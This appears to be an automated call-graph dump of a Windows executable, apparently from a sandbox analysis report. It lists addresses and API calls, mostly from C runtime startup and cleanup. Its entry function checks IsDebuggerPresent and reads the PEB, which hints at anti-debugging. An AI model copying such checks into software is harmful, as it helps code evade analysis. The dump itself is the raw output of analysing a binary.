66 API calls 11187 410624 11186->11187 11188 410655 11187->11188 11189 4100e6 ___removelocaleref 8 API calls 11187->11189 11199 410680 11188->11199 11194 410639 11189->11194 11192 410cbb _free 66 API calls 11192->11193 11194->11188 11195 41017f ___freetlocinfo 66 API calls 11194->11195 11195->11188 11202 412622 LeaveCriticalSection 11196->11202 11198 41061d 11198->11186 11203 412622 LeaveCriticalSection 11199->11203 11201 410662 11201->11192 11202->11198 11203->11201 8834 40f6f6 8874 412140 8834->8874 8836 40f702 GetStartupInfoW 8837 40f716 HeapSetInformation 8836->8837 8839 40f721 8836->8839 8837->8839 8875 412117 HeapCreate 8839->8875 8840 40f76f 8841 40f77a 8840->8841 9007 40f6cd 8840->9007 8876 410689 GetModuleHandleW 8841->8876 8844 40f780 8845 40f6cd _fast_error_exit 66 API calls 8844->8845 8846 40f78b __RTC_Initialize 8844->8846 8845->8846 8901 411e86 GetStartupInfoW 8846->8901 8849 40f7a5 GetCommandLineA 8914 411def GetEnvironmentStringsW 8849->8914 8856 40f7ca 8940 411abe 8856->8940 8857 4116e9 __amsg_exit 66 API calls 8857->8856 8859 40f7d0 8860 40f7db 8859->8860 8861 4116e9 __amsg_exit 66 API calls 8859->8861 8960 4114c8 8860->8960 8861->8860 8863 40f7e3 8864 40f7ee 8863->8864 8866 4116e9 __amsg_exit 66 API calls 8863->8866 8966 411a5f 8864->8966 8866->8864 8870 40f81e 9022 4116cb 8870->9022 8873 40f823 ___BuildCatchObjectHelper 8874->8836 8875->8840 8877 4106a6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8876->8877 8878 41069d 8876->8878 8880 4106f0 TlsAlloc 8877->8880 9025 4103d6 8878->9025 8883 4107ff 8880->8883 8884 41073e TlsSetValue 8880->8884 8883->8844 8884->8883 8885 41074f 8884->8885 9035 411471 8885->9035 8890 410797 DecodePointer 8893 4107ac 8890->8893 8891 4107fa 8892 4103d6 __mtterm 70 API calls 8891->8892 8892->8883 8893->8891 9044 412773 8893->9044 8896 4107ca DecodePointer 8897 4107db 8896->8897 8897->8891 8898 4107df 8897->8898 9050 410413 8898->9050 8900 4107e7 GetCurrentThreadId 8900->8883 8902 412773 __calloc_crt 66 API calls 8901->8902 8913 411ea4 8902->8913 8903 41204f GetStdHandle 8909 412019 8903->8909 8904 412773 __calloc_crt 66 API calls 8904->8913 8905 4120b3 SetHandleCount 8906 40f799 8905->8906 8906->8849 9015 4116e9 8906->9015 8907 412061 GetFileType 8907->8909 8908 411f99 8908->8909 8910 411fd0 InitializeCriticalSectionAndSpinCount 8908->8910 8911 411fc5 GetFileType 8908->8911 8909->8903 8909->8905 8909->8907 8912 412087 InitializeCriticalSectionAndSpinCount 8909->8912 8910->8906 8910->8908 8911->8908 8911->8910 8912->8906 8912->8909 8913->8904 8913->8906 8913->8908 8913->8909 8913->8913 8915 40f7b5 8914->8915 8916 411e0b WideCharToMultiByte 8914->8916 8927 411d34 8915->8927 8918 411e40 8916->8918 8919 411e78 FreeEnvironmentStringsW 8916->8919 8920 41272e __malloc_crt 66 API calls 8918->8920 8919->8915 8921 411e46 8920->8921 8921->8919 8922 411e4e WideCharToMultiByte 8921->8922 8923 411e60 8922->8923 8924 411e6c FreeEnvironmentStringsW 8922->8924 8925 410cbb _free 66 API calls 8923->8925 8924->8915 8926 411e68 8925->8926 8926->8924 8928 411d49 8927->8928 8929 411d4e GetModuleFileNameA 8927->8929 9297 410039 8928->9297 8931 411d75 8929->8931 9291 411b9a 8931->9291 8934 40f7bf 8934->8856 8934->8857 8935 411db1 8936 41272e __malloc_crt 66 API calls 8935->8936 8937 411db7 8936->8937 8937->8934 8938 411b9a _parse_cmdline 76 API calls 8937->8938 8939 411dd1 8938->8939 8939->8934 8941 411ac7 8940->8941 8943 411acc _strlen 8940->8943 8942 410039 ___initmbctable 94 API calls 8941->8942 8942->8943 8944 412773 __calloc_crt 66 API calls 8943->8944 8947 411ada 8943->8947 8949 411b01 _strlen 8944->8949 8945 411b50 8946 410cbb _free 66 API calls 8945->8946 8946->8947 8947->8859 8948 412773 __calloc_crt 66 API calls 8948->8949 8949->8945 8949->8947 8949->8948 8950 411b76 8949->8950 8953 411b8d 8949->8953 9738 410b34 8949->9738 8951 410cbb _free 66 API calls 8950->8951 8951->8947 8954 410a7d __invoke_watson 10 API calls 8953->8954 8955 411b99 8954->8955 8956 413a75 _parse_cmdline 76 API calls 8955->8956 8958 411c26 8955->8958 8956->8955 8957 411d24 8957->8859 8958->8957 8959 413a75 76 API calls _parse_cmdline 8958->8959 8959->8958 8962 4114d6 __IsNonwritableInCurrentImage 8960->8962 9747 4136e3 8962->9747 8963 4114f4 __initterm_e 8965 411515 __IsNonwritableInCurrentImage 8963->8965 9750 4110cb 8963->9750 8965->8863 8967 411a72 8966->8967 8968 411a6d 8966->8968 8970 40f7f4 8967->8970 8971 413a75 _parse_cmdline 76 API calls 8967->8971 8969 410039 ___initmbctable 94 API calls 8968->8969 8969->8967 8972 40deb0 IsDebuggerPresent 8970->8972 8971->8967 8973 40def4 8972->8973 8974 40df0a 8972->8974 8973->8870 9004 41169f 8973->9004 9815 401100 8974->9815 8977 40dfb0 9822 40de20 8977->9822 8978 40df45 GetPEB 8978->8973 8981 40dfe2 9832 40d7f0 8981->9832 8982 40dfdc 8982->8981 8984 40dfec 8982->8984 8985 40dfe7 8984->8985 9874 40f476 8984->9874 8985->8973 8987 40e0b1 LocalFree 8985->8987 8987->8973 8989 40e04e 8992 40f476 __wcsicoll 78 API calls 8989->8992 8990 40e00e 8991 40e033 8990->8991 8994 40f476 __wcsicoll 78 API calls 8990->8994 9882 405b10 8991->9882 8993 40e05f 8992->8993 8996 40e0a6 8993->8996 8997 40e066 8993->8997 8998 40e02c 8994->8998 9001 40d7f0 92 API calls 8996->9001 9000 40e084 8997->9000 9002 40f476 __wcsicoll 78 API calls 8997->9002 8998->8991 9911 405e10 9000->9911 9001->8985 9002->9000 10074 41155f 9004->10074 9006 4116b0 9006->8870 9008 40f6e0 9007->9008 9009 40f6db 9007->9009 9011 41172d __NMSG_WRITE 66 API calls 9008->9011 9010 4118dc __FF_MSGBANNER 66 API calls 9009->9010 9010->9008 9012 40f6e8 9011->9012 9013 411447 __mtinitlocknum 3 API calls 9012->9013 9014 40f6f2 9013->9014 9014->8841 9016 4118dc __FF_MSGBANNER 66 API calls 9015->9016 9017 4116f3 9016->9017 9018 41172d __NMSG_WRITE 66 API calls 9017->9018 9019 4116fb 9018->9019 10104 4116b5 9019->10104 9023 41155f _doexit 66 API calls 9022->9023 9024 4116d6 9023->9024 9024->8873 9026 4103e0 DecodePointer 9025->9026 9027 4103ef 9025->9027 9026->9027 9028 410400 TlsFree 9027->9028 9029 41040e 9027->9029 9028->9029 9030 4125e7 DeleteCriticalSection 9029->9030 9031 4125ff 9029->9031 9063 410cbb 9030->9063 9033 4106a2 9031->9033 9034 412611 DeleteCriticalSection 9031->9034 9033->8844 9034->9031 9089 410390 EncodePointer 9035->9089 9037 411479 __init_pointers __initp_misc_winsig 9090 4134af EncodePointer 9037->9090 9039 410754 EncodePointer EncodePointer EncodePointer EncodePointer 9040 412581 9039->9040 9041 41258c 9040->9041 9042 412596 InitializeCriticalSectionAndSpinCount 9041->9042 9043 410793 9041->9043 9042->9041 9042->9043 9043->8890 9043->8891 9046 41277c 9044->9046 9047 4107c2 9046->9047 9048 41279a Sleep 9046->9048 9091 413b47 9046->9091 9047->8891 9047->8896 9049 4127af 9048->9049 9049->9046 9049->9047 9102 412140 9050->9102 9052 41041f GetModuleHandleW 9103 4126fb 9052->9103 9054 41045d InterlockedIncrement 9110 4104b5 9054->9110 9057 4126fb __lock 64 API calls 9058 41047e 9057->9058 9113 410057 InterlockedIncrement 9058->9113 9060 41049c 9125 4104be 9060->9125 9062 4104a9 ___BuildCatchObjectHelper 9062->8900 9064 410cc6 HeapFree 9063->9064 9068 410cef _free 9063->9068 9065 410cdb 9064->9065 9064->9068 9069 410b21 9065->9069 9068->9029 9072 4104c7 GetLastError 9069->9072 9071 410b26 GetLastError 9071->9068 9086 4103a2 TlsGetValue 9072->9086 9075 410534 SetLastError 9075->9071 9076 412773 __calloc_crt 62 API calls 9077 4104f2 9076->9077 9077->9075 9078 4104fa DecodePointer 9077->9078 9079 41050f 9078->9079 9080 410513 9079->9080 9081 41052b 9079->9081 9082 410413 __getptd_noexit 62 API calls 9080->9082 9083 410cbb _free 62 API calls 9081->9083 9084 41051b GetCurrentThreadId 9082->9084 9085 410531 9083->9085 9084->9075 9085->9075 9087 4103d2 9086->9087 9088 4103b7 DecodePointer TlsSetValue 9086->9088 9087->9075 9087->9076 9088->9087 9089->9037 9090->9039 9092 413b53 9091->9092 9097 413b6e 9091->9097 9093 413b5f 9092->9093 9092->9097 9095 410b21 __wcsicmp_l 65 API calls 9093->9095 9094 413b81 HeapAlloc 9096 413ba8 9094->9096 9094->9097 9098 413b64 9095->9098 9096->9046 9097->9094 9097->9096 9100 4110f1 DecodePointer 9097->9100 9098->9046 9101 411106 9100->9101 9101->9097 9102->9052 9104 412710 9103->9104 9105 412723 EnterCriticalSection 9103->9105 9128 412639 9104->9128 9105->9054 9107 412716 9107->9105 9108 4116e9 __amsg_exit 65 API calls 9107->9108 9109 412722 9108->9109 9109->9105 9289 412622 LeaveCriticalSection 9110->9289 9112 410477 9112->9057 9114 410075 InterlockedIncrement 9113->9114 9115 410078 9113->9115 9114->9115 9116 410082 InterlockedIncrement 9115->9116 9117 410085 9115->9117 9116->9117 9118 410092 9117->9118 9119 41008f InterlockedIncrement 9117->9119 9120 41009c InterlockedIncrement 9118->9120 9121 41009f 9118->9121 9119->9118 9120->9121 9122 4100b8 InterlockedIncrement 9121->9122 9123 4100c8 InterlockedIncrement 9121->9123 9124 4100d3 InterlockedIncrement 9121->9124 9122->9121 9123->9121 9124->9060 9290 412622 LeaveCriticalSection 9125->9290 9127 4104c5 9127->9062 9129 412645 ___BuildCatchObjectHelper 9128->9129 9130 41266b 9129->9130 9153 4118dc 9129->9153 9139 41267b ___BuildCatchObjectHelper 9130->9139 9189 41272e 9130->9189 9137 41268d 9141 410b21 __wcsicmp_l 65 API calls 9137->9141 9138 41269c 9142 4126fb __lock 65 API calls 9138->9142 9139->9107 9141->9139 9143 4126a3 9142->9143 9144 4126d6 9143->9144 9145 4126ab InitializeCriticalSectionAndSpinCount 9143->9145 9148 410cbb _free 65 API calls 9144->9148 9146 4126c7 9145->9146 9147 4126bb 9145->9147 9194 4126f2 9146->9194 9149 410cbb _free 65 API calls 9147->9149 9148->9146 9150 4126c1 9149->9150 9152 410b21 __wcsicmp_l 65 API calls 9150->9152 9152->9146 9197 4139e3 9153->9197 9155 4118e3 9157 4139e3 __NMSG_WRITE 66 API calls 9155->9157 9159 4118f0 9155->9159 9156 41172d __NMSG_WRITE 66 API calls 9158 411908 9156->9158 9157->9159 9161 41172d __NMSG_WRITE 66 API calls 9158->9161 9159->9156 9160 411912 9159->9160 9162 41172d 9160->9162 9161->9160 9163 41174e __NMSG_WRITE 9162->9163 9164 41186a 9163->9164 9166 4139e3 __NMSG_WRITE 63 API calls 9163->9166 9258 40e542 9164->9258 9167 411768 9166->9167 9169 411879 GetStdHandle 9167->9169 9170 4139e3 __NMSG_WRITE 63 API calls 9167->9170 9168 4118da 9186 411447 9168->9186 9169->9164 9173 411887 _strlen 9169->9173 9171 411779 9170->9171 9171->9169 9172 41178b 9171->9172 9172->9164 9222 40f643 9172->9222 9173->9164 9176 4118bd WriteFile 9173->9176 9176->9164 9177 4117b7 GetModuleFileNameW 9178 4117d8 9177->9178 9183 4117e4 _wcslen 9177->9183 9179 40f643 __NMSG_WRITE 63 API calls 9178->9179 9179->9183 9180 410a7d __invoke_watson 10 API calls 9180->9183 9181 40f5ce 63 API calls __NMSG_WRITE 9181->9183 9183->9180 9183->9181 9184 41185a 9183->9184 9231 40f501 9183->9231 9240 41385c 9184->9240 9268 41141c GetModuleHandleW 9186->9268 9193 412737 9189->9193 9191 412686 9191->9137 9191->9138 9192 41274e Sleep 9192->9193 9193->9191 9193->9192 9272 410b93 9193->9272 9288 412622 LeaveCriticalSection 9194->9288 9196 4126f9 9196->9139 9198 4139ef 9197->9198 9199 4139f9 9198->9199 9200 410b21 __wcsicmp_l 66 API calls 9198->9200 9199->9155 9201 413a12 9200->9201 9204 410acf 9201->9204 9207 410aa2 DecodePointer 9204->9207 9208 410ab7 9207->9208 9213 410a7d 9208->9213 9210 410ace 9211 410aa2 __wcsicmp_l 10 API calls 9210->9211 9212 410adb 9211->9212 9212->9155 9216 410954 9213->9216 9217 410973 _memset __call_reportfault 9216->9217 9218 410991 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9217->9218 9219 410a5f __call_reportfault 9218->9219 9220 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9219->9220 9221 410a7b GetCurrentProcess TerminateProcess 9220->9221 9221->9210 9223 40f651 9222->9223 9224 40f658 9222->9224 9223->9224 9226 40f679 9223->9226 9225 410b21 __wcsicmp_l 66 API calls 9224->9225 9230 40f65d 9225->9230 9228 40f667 9226->9228 9229 410b21 __wcsicmp_l 66 API calls 9226->9229 9227 410acf __wcsicmp_l 11 API calls 9227->9228 9228->9177 9228->9183 9229->9230 9230->9227 9235 40f513 9231->9235 9232 40f517 9233 410b21 __wcsicmp_l 66 API calls 9232->9233 9234 40f51c 9232->9234 9239 40f533 9233->9239 9234->9183 9235->9232 9235->9234 9237 40f55a 9235->9237 9236 410acf __wcsicmp_l 11 API calls 9236->9234 9237->9234 9238 410b21 __wcsicmp_l 66 API calls 9237->9238 9238->9239 9239->9236 9266 410390 EncodePointer 9240->9266 9242 413882 9243 413892 LoadLibraryW 9242->9243 9244 41390f 9242->9244 9245 4138a7 GetProcAddress 9243->9245 9255 4139a7 9243->9255 9246 41393c 9244->9246 9250 413929 DecodePointer DecodePointer 9244->9250 9249 4138bd 7 API calls 9245->9249 9245->9255 9247 413972 DecodePointer 9246->9247 9248 41399b DecodePointer 9246->9248 9257 41395f 9246->9257 9247->9248 9254 413979 9247->9254 9248->9255 9249->9244 9251 4138ff GetProcAddress EncodePointer 9249->9251 9250->9246 9251->9244 9252 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9253 4139c6 9252->9253 9253->9164 9254->9248 9256 41398c DecodePointer 9254->9256 9255->9252 9256->9248 9256->9257 9257->9248 9259 40e54a 9258->9259 9260 40e54c IsDebuggerPresent 9258->9260 9259->9168 9267 4123ca 9260->9267 9263 40f93a SetUnhandledExceptionFilter UnhandledExceptionFilter 9264 40f95f GetCurrentProcess TerminateProcess 9263->9264 9265 40f957 __call_reportfault 9263->9265 9264->9168 9265->9264 9266->9242 9267->9263 9269 411430 GetProcAddress 9268->9269 9270 411445 ExitProcess 9268->9270 9269->9270 9271 411440 9269->9271 9271->9270 9273 410c10 9272->9273 9280 410ba1 9272->9280 9274 4110f1 _malloc DecodePointer 9273->9274 9275 410c16 9274->9275 9277 410b21 __wcsicmp_l 65 API calls 9275->9277 9276 4118dc __FF_MSGBANNER 65 API calls 9276->9280 9287 410c08 9277->9287 9278 410bcf HeapAlloc 9278->9280 9278->9287 9279 41172d __NMSG_WRITE 65 API calls 9279->9280 9280->9276 9280->9278 9280->9279 9281 410bfc 9280->9281 9283 411447 __mtinitlocknum 3 API calls 9280->9283 9284 4110f1 _malloc DecodePointer 9280->9284 9285 410bfa 9280->9285 9282 410b21 __wcsicmp_l 65 API calls 9281->9282 9282->9285 9283->9280 9284->9280 9286 410b21 __wcsicmp_l 65 API calls 9285->9286 9286->9287 9287->9193 9288->9196 9289->9112 9290->9127 9293 411bb9 9291->9293 9295 411c26 9293->9295 9301 413a75 9293->9301 9294 411d24 9294->8934 9294->8935 9295->9294 9296 413a75 76 API calls _parse_cmdline 9295->9296 9296->9295 9298 410042 9297->9298 9299 410049 9297->9299 9625 40fe9f 9298->9625 9299->8929 9304 413a22 9301->9304 9307 40e551 9304->9307 9308 40e564 9307->9308 9309 40e5b1 9307->9309 9315 410540 9308->9315 9309->9293 9313 40e591 9313->9309 9335 40fb96 9313->9335 9316 4104c7 __getptd_noexit 66 API calls 9315->9316 9317 410548 9316->9317 9318 40e569 9317->9318 9319 4116e9 __amsg_exit 66 API calls 9317->9319 9318->9313 9320 410317 9318->9320 9319->9318 9321 410323 ___BuildCatchObjectHelper 9320->9321 9322 410540 __getptd 66 API calls 9321->9322 9323 410328 9322->9323 9324 410356 9323->9324 9326 41033a 9323->9326 9325 4126fb __lock 66 API calls 9324->9325 9327 41035d 9325->9327 9328 410540 __getptd 66 API calls 9326->9328 9351 4102ca 9327->9351 9330 41033f 9328->9330 9333 41034d ___BuildCatchObjectHelper 9330->9333 9334 4116e9 __amsg_exit 66 API calls 9330->9334 9333->9313 9334->9333 9336 40fba2 ___BuildCatchObjectHelper 9335->9336 9337 410540 __getptd 66 API calls 9336->9337 9338 40fba7 9337->9338 9339 4126fb __lock 66 API calls 9338->9339 9340 40fbb9 9338->9340 9341 40fbd7 9339->9341 9343 40fbc7 ___BuildCatchObjectHelper 9340->9343 9345 4116e9 __amsg_exit 66 API calls 9340->9345 9342 40fc20 9341->9342 9346 40fc08 InterlockedIncrement 9341->9346 9347 40fbee InterlockedDecrement 9341->9347 9621 40fc31 9342->9621 9343->9309 9345->9343 9346->9342 9347->9346 9348 40fbf9 9347->9348 9348->9346 9349 410cbb _free 66 API calls 9348->9349 9350 40fc07 9349->9350 9350->9346 9352 4102d7 9351->9352 9353 41030c 9351->9353 9352->9353 9354 410057 ___addlocaleref 8 API calls 9352->9354 9359 410384 9353->9359 9355 4102ed 9354->9355 9355->9353 9362 4100e6 9355->9362 9620 412622 LeaveCriticalSection 9359->9620 9361 41038b 9361->9330 9363 4100f7 InterlockedDecrement 9362->9363 9364 41017a 9362->9364 9365 41010c InterlockedDecrement 9363->9365 9366 41010f 9363->9366 9364->9353 9376 41017f 9364->9376 9365->9366 9367 410119 InterlockedDecrement 9366->9367 9368 41011c 9366->9368 9367->9368 9369 410126 InterlockedDecrement 9368->9369 9370 410129 9368->9370 9369->9370 9371 410133 InterlockedDecrement 9370->9371 9373 410136 9370->9373 9371->9373 9372 41014f InterlockedDecrement 9372->9373 9373->9372 9374 41015f InterlockedDecrement 9373->9374 9375 41016a InterlockedDecrement 9373->9375 9374->9373 9375->9364 9377 410203 9376->9377 9378 410196 9376->9378 9379 410250 9377->9379 9380 410cbb _free 66 API calls 9377->9380 9378->9377 9384 4101ca 9378->9384 9389 410cbb _free 66 API calls 9378->9389 9397 410279 9379->9397 9446 41280d 9379->9446 9382 410224 9380->9382 9386 410cbb _free 66 API calls 9382->9386 9385 4101eb 9384->9385 9392 410cbb _free 66 API calls 9384->9392 9387 410cbb _free 66 API calls 9385->9387 9391 410237 9386->9391 9394 4101f8 9387->9394 9388 4102be 9395 410cbb _free 66 API calls 9388->9395 9396 4101bf 9389->9396 9390 410cbb _free 66 API calls 9390->9397 9393 410cbb _free 66 API calls 9391->9393 9398 4101e0 9392->9398 9399 410245 9393->9399 9401 410cbb _free 66 API calls 9394->9401 9402 4102c4 9395->9402 9406 412bed 9396->9406 9397->9388 9400 410cbb 66 API calls _free 9397->9400 9434 412b84 9398->9434 9405 410cbb _free 66 API calls 9399->9405 9400->9397 9401->9377 9402->9353 9405->9379 9407 412bfe 9406->9407 9433 412ce7 9406->9433 9408 412c0f 9407->9408 9409 410cbb _free 66 API calls 9407->9409 9410 412c21 9408->9410 9411 410cbb _free 66 API calls 9408->9411 9409->9408 9412 410cbb _free 66 API calls 9410->9412 9415 412c33 9410->9415 9411->9410 9412->9415 9413 410cbb _free 66 API calls 9416 412c45 9413->9416 9414 412c57 9418 412c69 9414->9418 9419 410cbb _free 66 API calls 9414->9419 9415->9413 9415->9416 9416->9414 9417 410cbb _free 66 API calls 9416->9417 9417->9414 9420 412c7b 9418->9420 9421 410cbb _free 66 API calls 9418->9421 9419->9418 9422 412c8d 9420->9422 9423 410cbb _free 66 API calls 9420->9423 9421->9420 9424 412c9f 9422->9424 9425 410cbb _free 66 API calls 9422->9425 9423->9422 9426 412cb1 9424->9426 9427 410cbb _free 66 API calls 9424->9427 9425->9424 9428 412cc3 9426->9428 9429 410cbb _free 66 API calls 9426->9429 9427->9426 9430 412cd5 9428->9430 9431 410cbb _free 66 API calls 9428->9431 9429->9428 9432 410cbb _free 66 API calls 9430->9432 9430->9433 9431->9430 9432->9433 9433->9384 9435 412b91 9434->9435 9445 412be9 9434->9445 9436 412ba1 9435->9436 9437 410cbb _free 66 API calls 9435->9437 9438 410cbb _free 66 API calls 9436->9438 9442 412bb3 9436->9442 9437->9436 9438->9442 9439 410cbb _free 66 API calls 9440 412bc5 9439->9440 9441 412bd7 9440->9441 9443 410cbb _free 66 API calls 9440->9443 9444 410cbb _free 66 API calls 9441->9444 9441->9445 9442->9439 9442->9440 9443->9441 9444->9445 9445->9385 9447 41281e 9446->9447 9619 41026e 9446->9619 9448 410cbb _free 66 API calls 9447->9448 9449 412826 9448->9449 9450 410cbb _free 66 API calls 9449->9450 9451 41282e 9450->9451 9452 410cbb _free 66 API calls 9451->9452 9453 412836 9452->9453 9454 410cbb _free 66 API calls 9453->9454 9455 41283e 9454->9455 9456 410cbb _free 66 API calls 9455->9456 9457 412846 9456->9457 9458 410cbb _free 66 API calls 9457->9458 9459 41284e 9458->9459 9460 410cbb _free 66 API calls 9459->9460 9461 412855 9460->9461 9462 410cbb _free 66 API calls 9461->9462 9463 41285d 9462->9463 9464 410cbb _free 66 API calls 9463->9464 9465 412865 9464->9465 9466 410cbb _free 66 API calls 9465->9466 9467 41286d 9466->9467 9468 410cbb _free 66 API calls 9467->9468 9469 412875 9468->9469 9470 410cbb _free 66 API calls 9469->9470 9471 41287d 9470->9471 9472 410cbb _free 66 API calls 9471->9472 9473 412885 9472->9473 9474 410cbb _free 66 API calls 9473->9474 9475 41288d 9474->9475 9476 410cbb _free 66 API calls 9475->9476 9477 412895 9476->9477 9478 410cbb _free 66 API calls 9477->9478 9479 41289d 9478->9479 9480 410cbb _free 66 API calls 9479->9480 9481 4128a8 9480->9481 9482 410cbb _free 66 API calls 9481->9482 9483 4128b0 9482->9483 9484 410cbb _free 66 API calls 9483->9484 9485 4128b8 9484->9485 9486 410cbb _free 66 API calls 9485->9486 9487 4128c0 9486->9487 9488 410cbb _free 66 API calls 9487->9488 9489 4128c8 9488->9489 9490 410cbb _free 66 API calls 9489->9490 9491 4128d0 9490->9491 9492 410cbb _free 66 API calls 9491->9492 9493 4128d8 9492->9493 9494 410cbb _free 66 API calls 9493->9494 9495 4128e0 9494->9495 9496 410cbb _free 66 API calls 9495->9496 9497 4128e8 9496->9497 9498 410cbb _free 66 API calls 9497->9498 9499 4128f0 9498->9499 9500 410cbb _free 66 API calls 9499->9500 9501 4128f8 9500->9501 9502 410cbb _free 66 API calls 9501->9502 9503 412900 9502->9503 9504 410cbb _free 66 API calls 9503->9504 9505 412908 9504->9505 9506 410cbb _free 66 API calls 9505->9506 9507 412910 9506->9507 9508 410cbb _free 66 API calls 9507->9508 9509 412918 9508->9509 9510 410cbb _free 66 API calls 9509->9510 9511 412920 9510->9511 9512 410cbb _free 66 API calls 9511->9512 9513 41292e 9512->9513 9514 410cbb _free 66 API calls 9513->9514 9515 412939 9514->9515 9516 410cbb _free 66 API calls 9515->9516 9517 412944 9516->9517 9518 410cbb _free 66 API calls 9517->9518 9519 41294f 9518->9519 9520 410cbb _free 66 API calls 9519->9520 9521 41295a 9520->9521 9522 410cbb _free 66 API calls 9521->9522 9523 412965 9522->9523 9524 410cbb _free 66 API calls 9523->9524 9525 412970 9524->9525 9526 410cbb _free 66 API calls 9525->9526 9527 41297b 9526->9527 9528 410cbb _free 66 API calls 9527->9528 9529 412986 9528->9529 9530 410cbb _free 66 API calls 9529->9530 9531 412991 9530->9531 9532 410cbb _free 66 API calls 9531->9532 9533 41299c 9532->9533 9534 410cbb _free 66 API calls 9533->9534 9535 4129a7 9534->9535 9536 410cbb _free 66 API calls 9535->9536 9537 4129b2 9536->9537 9538 410cbb _free 66 API calls 9537->9538 9539 4129bd 9538->9539 9540 410cbb _free 66 API calls 9539->9540 9541 4129c8 9540->9541 9542 410cbb _free 66 API calls 9541->9542 9543 4129d3 9542->9543 9544 410cbb _free 66 API calls 9543->9544 9545 4129e1 9544->9545 9546 410cbb _free 66 API calls 9545->9546 9547 4129ec 9546->9547 9548 410cbb _free 66 API calls 9547->9548 9549 4129f7 9548->9549 9550 410cbb _free 66 API calls 9549->9550 9551 412a02 9550->9551 9552 410cbb _free 66 API calls 9551->9552 9553 412a0d 9552->9553 9554 410cbb _free 66 API calls 9553->9554 9555 412a18 9554->9555 9556 410cbb _free 66 API calls 9555->9556 9557 412a23 9556->9557 9558 410cbb _free 66 API calls 9557->9558 9559 412a2e 9558->9559 9560 410cbb _free 66 API calls 9559->9560 9561 412a39 9560->9561 9562 410cbb _free 66 API calls 9561->9562 9563 412a44 9562->9563 9564 410cbb _free 66 API calls 9563->9564 9565 412a4f 9564->9565 9566 410cbb _free 66 API calls 9565->9566 9567 412a5a 9566->9567 9568 410cbb _free 66 API calls 9567->9568 9569 412a65 9568->9569 9570 410cbb _free 66 API calls 9569->9570 9571 412a70 9570->9571 9572 410cbb _free 66 API calls 9571->9572 9573 412a7b 9572->9573 9574 410cbb _free 66 API calls 9573->9574 9575 412a86 9574->9575 9576 410cbb _free 66 API calls 9575->9576 9577 412a94 9576->9577 9578 410cbb _free 66 API calls 9577->9578 9579 412a9f 9578->9579 9580 410cbb _free 66 API calls 9579->9580 9581 412aaa 9580->9581 9582 410cbb _free 66 API calls 9581->9582 9583 412ab5 9582->9583 9584 410cbb _free 66 API calls 9583->9584 9585 412ac0 9584->9585 9586 410cbb _free 66 API calls 9585->9586 9587 412acb 9586->9587 9588 410cbb _free 66 API calls 9587->9588 9589 412ad6 9588->9589 9590 410cbb _free 66 API calls 9589->9590 9591 412ae1 9590->9591 9592 410cbb _free 66 API calls 9591->9592 9593 412aec 9592->9593 9594 410cbb _free 66 API calls 9593->9594 9595 412af7 9594->9595 9596 410cbb _free 66 API calls 9595->9596 9597 412b02 9596->9597 9598 410cbb _free 66 API calls 9597->9598 9599 412b0d 9598->9599 9600 410cbb _free 66 API calls 9599->9600 9601 412b18 9600->9601 9602 410cbb _free 66 API calls 9601->9602 9603 412b23 9602->9603 9604 410cbb _free 66 API calls 9603->9604 9605 412b2e 9604->9605 9606 410cbb _free 66 API calls 9605->9606 9607 412b39 9606->9607 9608 410cbb _free 66 API calls 9607->9608 9609 412b47 9608->9609 9610 410cbb _free 66 API calls 9609->9610 9611 412b52 9610->9611 9612 410cbb _free 66 API calls 9611->9612 9613 412b5d 9612->9613 9614 410cbb _free 66 API calls 9613->9614 9615 412b68 9614->9615 9616 410cbb _free 66 API calls 9615->9616 9617 412b73 9616->9617 9618 410cbb _free 66 API calls 9617->9618 9618->9619 9619->9390 9620->9361 9624 412622 LeaveCriticalSection 9621->9624 9623 40fc38 9623->9340 9624->9623 9626 40feab ___BuildCatchObjectHelper 9625->9626 9627 410540 __getptd 66 API calls 9626->9627 9628 40feb4 9627->9628 9629 40fb96 __setmbcp 68 API calls 9628->9629 9630 40febe 9629->9630 9656 40fc3a 9630->9656 9633 41272e __malloc_crt 66 API calls 9634 40fedf 9633->9634 9635 40fffe ___BuildCatchObjectHelper 9634->9635 9663 40fcb6 9634->9663 9635->9299 9638 41000b 9638->9635 9643 41001e 9638->9643 9645 410cbb _free 66 API calls 9638->9645 9639 40ff0f InterlockedDecrement 9640 40ff30 InterlockedIncrement 9639->9640 9641 40ff1f 9639->9641 9640->9635 9642 40ff46 9640->9642 9641->9640 9644 410cbb _free 66 API calls 9641->9644 9642->9635 9648 4126fb __lock 66 API calls 9642->9648 9646 410b21 __wcsicmp_l 66 API calls 9643->9646 9647 40ff2f 9644->9647 9645->9643 9646->9635 9647->9640 9650 40ff5a InterlockedDecrement 9648->9650 9651 40ffd6 9650->9651 9652 40ffe9 InterlockedIncrement 9650->9652 9651->9652 9654 410cbb _free 66 API calls 9651->9654 9673 410000 9652->9673 9655 40ffe8 9654->9655 9655->9652 9657 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 9656->9657 9658 40fc4e 9657->9658 9659 40fc77 9658->9659 9660 40fc59 GetOEMCP 9658->9660 9661 40fc7c GetACP 9659->9661 9662 40fc69 9659->9662 9660->9662 9661->9662 9662->9633 9662->9635 9664 40fc3a getSystemCP 78 API calls 9663->9664 9665 40fcd6 9664->9665 9666 40fce1 setSBCS 9665->9666 9668 40fd25 IsValidCodePage 9665->9668 9672 40fd4a _memset __setmbcp_nolock 9665->9672 9667 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9666->9667 9669 40fe9d 9667->9669 9668->9666 9670 40fd37 GetCPInfo 9668->9670 9669->9638 9669->9639 9670->9666 9670->9672 9676 40fa06 GetCPInfo 9672->9676 9737 412622 LeaveCriticalSection 9673->9737 9675 410007 9675->9635 9678 40fa3a _memset 9676->9678 9685 40faee 9676->9685 9686 412541 9678->9686 9681 40e542 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 9683 40fb94 9681->9683 9683->9672 9684 41134c ___crtLCMapStringA 82 API calls 9684->9685 9685->9681 9687 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 9686->9687 9688 412554 9687->9688 9696 41245a 9688->9696 9691 41134c 9692 40e551 _LocaleUpdate::_LocaleUpdate 76 API calls 9691->9692 9693 41135f 9692->9693 9713 411165 9693->9713 9697 412483 MultiByteToWideChar 